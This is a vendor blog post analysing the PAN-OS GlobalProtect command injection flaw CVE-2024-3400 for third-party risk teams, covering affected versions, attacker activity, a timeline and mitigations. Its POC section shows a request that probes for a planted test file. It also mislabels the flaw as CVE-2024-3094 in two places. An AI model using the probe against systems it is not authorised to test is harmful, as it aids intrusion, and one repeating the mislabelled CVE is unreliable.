Written by: Ferdi Gül
Additional Contributions: Ferhat Dikbiyik

The critical vulnerability assigned to Palo Alto’s PAN-OS as CVE-2024-3400 has recently captured the attention of the cybersecurity community. The recently discovered CVE-2024-3400 security flaw is identified as a critical vulnerability posing a potential threat across various systems. We will provide a comprehensive analysis of CVE-2024-3400, discussing what it is, how it operates, and potential risks for organizations. Additionally, we will explore measures and solutions that can be taken against this security flaw. Through an analysis from the perspective of Third-Party Risk Management (TPRM), we aim to emphasize why it is profoundly important for professionals in the field and highlight lessons that can be drawn to safeguard against future threats.

WHAT’S THE CVE-2024-3400 VULNERABILITY?

Palo Alto Networks has disclosed a critical command injection vulnerability in many firewalls using the PAN-OS operating system. CVE-2024-3400 vulnerability allows unauthorized attackers to execute code with root privileges on affected devices. This could lead to attackers infiltrating networks, stealing data, or compromising critical systems. 

CISA has issued a vulnerability alert for PAN-OS, identified as CVE-2024-3094, urging affected entities to apply recommended mitigations and report any suspicious activity.

WHAT ARE THE DETAILS FOR CVE-2024-3400?

The CVE-2024-3400 vulnerability is related to a command injection flaw found within Palo Alto Networks’ PAN-OS software, affecting specific versions and feature configurations. Exploiting this flaw could grant unauthorized access, allowing individuals to execute arbitrary code with root-level privileges on affected firewalls, bypassing authentication requirements. This vulnerability specifically impacts PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls configured with both GlobalProtect gateway and device telemetry features enabled. Potential consequences of exploitation include system compromise, data theft or deletion, and interception or alteration of network traffic.

The attacker, identified as UTA0218 (a state-backed hacking group), successfully exploited the firewall device to establish a reverse shell and install additional tools, thereby gaining a foothold within victim organizations. In addition, attempts were made to install a custom Python backdoor named UPSTYLE on the firewall, providing the attacker with remote command execution capabilities via specially crafted network requests. Further tooling was downloaded from remote servers under the attacker’s control, facilitating access to internal networks and extraction of sensitive credentials and files. The attacker’s advanced tactics and swift execution indicate a sophisticated threat actor with clear objectives. 

Organizations utilizing GlobalProtect firewall devices should promptly address this vulnerability to mitigate the risk of exploitation and prevent potential breaches.

You can confirm if a GlobalProtect gateway or GlobalProtect portal is set up by reviewing entries in your firewall web interface (Network > GlobalProtect > Gateways or Network > GlobalProtect > Portals). 

Additionally, ensure device telemetry is activated by inspecting your firewall web interface (Device > Setup > Telemetry).

POC FOR THE VULNERABILITY

While examining this vulnerability, the analysis was conducted based on a recently published proof of concept (POC). If you are using the vulnerable product version or if you want to test the vulnerability yourself, you can do so by considering the requests and corresponding responses below. The OS Command Injection vulnerability has been tested and demonstrated primarily on the SESSID mentioned below.

 # Creating test file called ‘BKTest’ on the server with root access:

When attempting to access the files, you should receive a 403 error instead of a 404 error. The expected response for this process is a 404 Not Found if the system is not vulnerable.

# This request checks for the presence of the “BKTest.txt” file:

 GET /global-protect/portal/images/BKTest.txt HTTP/1.1

# Command Injection Process:

WHAT’S THE RELATIONSHIP BETWEEN THE VULNERABILITY AND THREAT ACTORS/RANSOMWARE GROUPS?

Due to the widespread use of these products by corporate firms, vulnerabilities that may arise are quite likely to always be on the radar of threat actors.

Operation MidnightEclipse, a mysterious cyber attack operation discovered in the first quarter of 2024, has rocked the cybersecurity community. Exploiting the critical CVE-2024-3400 vulnerability in Palo Alto Networks’ GlobalProtect software, this operation targeted various entities including government agencies, financial institutions, and critical infrastructure providers. Utilizing a bespoke backdoor software named “UPSTYLE,” the attackers gained access to affected systems, carrying out malicious activities such as data exfiltration, phishing attacks, and command and control operations. This operation underscores the continuously evolving cybersecurity risks and emphasizes the increasing need for awareness and preparedness against such attacks. Users should ensure they install the latest software patches to protect their systems and remain proactive in monitoring and mitigating cybersecurity risks.

On the other hand, the threat actor identified as UTA0218 was observed to have exploited vulnerabilities in the firewall remotely, creating a reverse shell, downloading additional tools, pivoting into internal networks, and ultimately exfiltrating data. The skill and speed exhibited by the attacker point to a highly capable threat actor with a clear understanding of what resources to target to advance their objectives. UTA0218’s initial objectives included obtaining domain backup DPAPI keys and targeting active directory credentials by acquiring the NTDS.DIT file. 

Additionally, they aimed to target user workstations to steal saved cookies and login data, along with users’ DPAPI keys.

WHAT’S THE SCOPE OF THE PAN-OS COMMAND INJECTION VULNERABILITY?

CVE-2024-3400 affects all PAN firewalls using specific versions of PAN-OS, including but not limited to:

  • PAN-OS 10.2.x
  • PAN-OS 11.0.x
  • PAN-OS 11.1.x

If GlobalProtect Gateway and/or GlobalProtect portal and device telemetry are enabled, other versions of PAN-OS may also be affected, including:

  • PAN-OS 9.1.x
  • PAN-OS 9.0.x

Note: It is known that Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability. 

The issue has been resolved in hotfix releases for PAN-OS versions 10.2.9-h1, 11.0.4-h1, and 11.1.2-h3, as well as in subsequent versions. Additionally, hotfixes will be provided for other frequently used maintenance releases to address the issue. More information on the release dates of these hotfixes can be found below.

HOW MANY ENDPOINTS CAN BE ACCESSED THROUGH PAN-OS AND GLOBALPROTECT?

Pan-OS and GlobalProtect are leading solutions in cybersecurity  widely adopted by numerous organizations worldwide. Through recent research specifically on Pan-OS and GlobalProtect, it was discovered that individually, more than 34,000 endpoints could be externally accessed. It’s important to note that GlobalProtect may have a separate user base, potentially different from that of Pan-OS.

In general, the top countries using GlobalProtect and PAN-OS.

Timeline for CVE-2024-3400:

  • March 26, 2024

o   Initial successful exploitation attempts observed across multiple organizations.

  • April 10, 2024

o   Volexity identified zero-day exploitation of the vulnerability in a customer’s firewall. CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect – Palo Alto Networks Security Advisories: https://security.paloaltonetworks.com/CVE-2024-3400

  • April 12, 2024

o   Initial publication. Volexity has noticed UTA0218 exploiting firewall devices to deploy malicious payloads effectively, then alerts Palo Alto Networks. 

o   Palo Alto Networks released a security advisory on CVE-2024-3400. CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect – Palo Alto Networks Security Advisories: https://security.paloaltonetworks.com/CVE-2024-3400

o   The vulnerability has been added to CISA’s Known Exploited Vulnerabilities catalog. https://www.cisa.gov/known-exploited-vulnerabilities-catalog

o   Microsoft published information about Defender support for CVE-2024-3400. Defender support for CVE-2024-3400 affecting Palo Alto Networks firewalls: https://techcommunity.microsoft.com/t5/microsoft-defender-vulnerability/defender-support-for-cve-2024-3400-affecting-palo-alto-networks/ba-p/4113917

o   The vulnerability was analyzed and the FocusTagTM processing was completed by Black Kite’s Research Team.

  • April 14, 2024:

o   Clarified impact on GlobalProtect portal configurations. Palo Alto Networks releases a patch for CVE-2024-3400. CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect – Palo Alto Networks Security Advisories: https://security.paloaltonetworks.com/CVE-2024-3400

  • April 15, 2024:
    •  PAN-OS fixes were released, with Palo Alto Networks stating that additional fixes are forthcoming. They also provided clarification on workarounds and mitigations for the use of Panorama templates.
  • April 16, 2024:
    • POC exploit code was published.
  • April 17, 2024:
    • Included additional Threat Prevention Threat ID within Workarounds and Mitigations
    • Incorporated a command-line interface (CLI) function to identify potential signs of exploit activity

Indicators of Compromise (IOCs)

Palo Alto Networks has released software patches addressing the CVE-2024-3400 vulnerability. It is recommended to install the latest patches on all affected devices as soon as possible. Additionally, you can take the following steps:

  • Disable GlobalProtect Gateway and/or GlobalProtect portal and device telemetry feature (unless necessary).
  • Implement layered security using network access control lists (ACLs) on your firewall.
  • Keep your firewall’s operating system up to date. 
  • Monitor your network traffic for suspicious activities. 

HOW CAN TPRM PROFESSIONALS ADDRESS THE PAN-OS INCIDENT’S WIDE-REACHING IMPLICATIONS?

The recent discovery of CVE-2024-3400, a critical OS command injection vulnerability in Palo Alto Networks PAN-OS, demands immediate attention from TPRM (Third-Party Risk Management) professionals. This vulnerability poses a severe threat because it allows attackers to potentially take complete control of affected firewalls without needing any authentication.

The widespread impact of CVE-2024-3400 stems from its potential to affect entire organizations that rely on Palo Alto firewalls for their network security. A successful exploit could grant attackers access to a vast amount of sensitive data or even disrupt critical operations.

TPRM Strategies for Mitigating CVE-2024-3400 Risks

  • Prioritize communication with Palo Alto Networks: TPRM professionals should reach out to Palo Alto Networks to confirm if their organization’s specific PAN-OS version and configuration are vulnerable to CVE-2024-3400.
  • Proactive Risk Assessments: Don’t wait for vendor updates. Conduct thorough risk assessments to identify potentially affected firewalls within your network.
  • Threat Intelligence is Key: Utilize threat intelligence feeds to stay updated on the evolving exploitation landscape surrounding CVE-2024-3400 and identify any indicators of compromise.
  • Patch Immediately: Once a patch becomes available from Palo Alto Networks, prioritize its deployment on all vulnerable firewalls to mitigate the risk of exploitation.

Effective Risk Management Through Collaboration

By working closely with vendors and leveraging threat intelligence, TPRM professionals can ensure a comprehensive understanding of their exposure to CVE-2024-3400. This proactive approach allows for swift mitigation strategies and strengthens your organization’s overall cybersecurity posture.

Check out the Black Kite Supply Chain Module here

Questions to ask vendors:

In the wake of CVE-2024-3400, which impacts Palo Alto Networks firewalls, TPRM professionals should prioritize asking pointed questions to assess vendor exposure and implemented mitigation strategies:

Impact Assessment:

  • Does your organization utilize Palo Alto Networks firewalls running PAN-OS 10.2, 11.0, or 11.1 with both GlobalProtect (gateway or portal) and device telemetry enabled?
  • Have you identified any potentially vulnerable firewalls within your infrastructure based on the configuration details outlined in the CVE-2024-3400 advisory?

Mitigation Strategy:

  • Have you implemented the patches released by Palo Alto Networks to address CVE-2024-3400 on your vulnerable firewalls?
  • If patches are not yet deployed, what is your estimated timeline for patching these systems?

Detection and Remediation:

  • Have you conducted any scans or employed specific tools to detect the presence of the vulnerable versions of PAN-OS (10.2, 11.0, 11.1) with the mentioned GlobalProtect configuration?
  • If any vulnerable systems were identified, what steps have you taken to isolate and remediate them?

Vendor Transparency:

  • Can you share any indicators of compromise (IOCs) or specific details related to exploitation attempts observed for CVE-2024-3400 within your environment?
  • In light of CVE-2024-3400, how is Palo Alto Networks enhancing its security practices to prevent similar vulnerabilities in future PAN-OS releases?

How can Vendors Detect and Remediate CVE-2024-3094?

CVE-2024-3400 mitigation strategies include enabling Threat ID 95187 in Palo Alto Networks Threat Prevention (if subscribed), temporarily disabling device telemetry (reduce attack surface but limits data collection), reviewing Palo Alto Networks advisories for log analysis recommendations to identify potential exploitation attempts, and utilizing updated vulnerability scanners to detect susceptible firewalls. These methods provide temporary protection until the official patch from Palo Alto Networks is applied.

Detection

  • Identify Vulnerable Systems: Palo Alto Networks PAN-OS versions 10.2, 11.0, and 11.1 with GlobalProtect gateway or portal (or both) and device telemetry enabled are susceptible.
  • Security Software Scans: Utilize up-to-date security solutions that can detect this type of vulnerability.
  • Security Advisories: Refer to Palo Alto Networks security advisories (https://unit42.paloaltonetworks.com/cve-2024-3400/) for detailed detection methodologies.

Remediation

  • Patch Installation: Apply the security patch released by Palo Alto Networks as soon as possible.

Immediate Actions

  • Identify Vulnerable Devices: Determine which of your firewalls are running susceptible PAN-OS versions and have GlobalProtect configured as described above.

Verification

  • Post-Patch Verification: Following the patch installation, consult Palo Alto Networks advisories for methods to confirm successful remediation.

Communication

  • Stakeholder Communication: Inform all relevant personnel concerning the vulnerability and the implemented mitigation strategies.
  • Continuous Updates: Provide ongoing updates throughout the process as new information arises.

EMPOWERING TPRM PROFESSIONALS: NAVIGATING CVE-2024-3400 WITH BLACK KITE’S FOCUS TAGS

Today, we set our sights on CVE-2024-3400, a critical vulnerability impacting Palo Alto Networks firewalls. Let’s delve into the implications for Third-Party Risk Management (TPRM) professionals and explore how Black Kite’s FocusTags™ can empower them to navigate this complex issue.

 In the Black Kite dashboard, users can filter all vendors associated with the GlobalProtect’s vulnerability using FocusTags™.

Black Kite released the GlobalProtect tag on April 12, 2024, offering crucial insights into potentially vulnerable assets and vendors. TPRM professionals can leverage this information to identify and prioritize risk assessments for vendors using affected GlobalProtect versions, streamlining the remediation process and bolstering cybersecurity posture effectively.

Black Kite users can search through their vendor ecosystem using FocusTags™.

CONCLUSION

The recent revelation of CVE-2024-3400, a critical vulnerability in Palo Alto Networks firewalls, serves as a stark reminder of the constant vigilance required in cybersecurity. This zero-day exploit, targeting unauthenticated attackers, underscores the importance of timely patching and robust security configurations.

CVE-2024-3400 exposes Palo Alto Networks firewalls to a critical remote code execution vulnerability. Immediate action is required to patch affected systems and mitigate potential compromise. This incident highlights the necessity for vigilance in maintaining up-to-date security measures and underscores the importance of layered defenses for robust network security.

The wake-up call from CVE-2024-3400 is two-fold. First, for Palo Alto Networks users, ensuring their firewalls are updated with the latest patches is paramount. Second, this incident highlights the need for a layered security approach. While firewalls are a crucial line of defense, they should not be the sole reliance.

Moving forward, organizations must prioritize continuous security monitoring and threat intelligence gathering. Proactive measures like penetration testing and vulnerability scanning can help identify weaknesses before they are exploited.

By working together, sharing threat information, and implementing a multi-layered defense strategy, we can build a more resilient digital ecosystem. Let’s learn from CVE-2024-3400 and use it as an opportunity to strengthen our collective cybersecurity posture.

About Focus Friday

Every week, we delve into the realms of critical vulnerabilities and their implications from a Third-Party Risk Management (TPRM) perspective. This series is dedicated to shedding light on pressing cybersecurity threats, offering in-depth analyses, and providing actionable insights.

Want to take a closer look at Focus Tags™?

Take our platform for a test drive and request a demo today.

Request a Demo

FocusTagsTM in the Last 30 Days:

  • GlobalProtect [Suspected]: CVE-2024-3400, OS Command Injection Vulnerability
  • Oracle WebLogic: CVE-2024-21007, CVE-2024-21006, Unauthorized Critical Data Access Vulnerability [Updated Tag]
  • Adobe Commerce [Suspected]: CVE-2024-20720, CVE-2024-20719, OS Command Injection Vulnerability, XSS Vulnerability
  • XZ Utils Backdoor: CVE-2024-3094, The tagging process has been completed based on the OS called Alpine, Fedora, Debian, OpenSuse-Tumbleweed.
  • pgAdmin [Suspected]:CVE-2024-2044, The tagging process has been done on an all-version basis, CVE-2024-3116,Remote Code Execution Vulnerability [Updated Tag]
  • OpenEdge [Suspected]:CVE-2024-1403, Authentication Bypass Vulnerability
  • QNAP QTS:CVE-2024-21899, An Improper Authentication Vulnerability [Updated Tag]
  • Outlook RCE:CVE-2024-21378, Remote Code Execution Vulnerability
  • FortiOS SSL VPN [Suspected]:CVE-2024-23112,Authentication Bypass Vulnerability [Updated Tag]
  • FortiClient EMS [Suspected]:CVE-2023-48788,SQL Injection Vulnerability
  • PostgreSQL [Suspected]:CVE-2024-1597, SQL Injection Vulnerability
  • Apache HTTP Server:CVE-2021-41773, Path Traversal Vulnerability, RCE Vulnerability

References:

A first detailed analysis of the vulnerability.

Details of the vulnerability by Unit 42.

CISA, https://www.cisa.gov/news-events/alerts/2024/04/12/palo-alto-networks-releases-guidance-vulnerability-pan-os-cve-2024-3400

IOCs by Volexity.

YARA Rules written by Volexity.

Palo Alto Networks Security Advisory for vulnerability.Defender support for vulnerability in Microsoft Defender Vulnerability Management Blog by Nimrod Roimyi.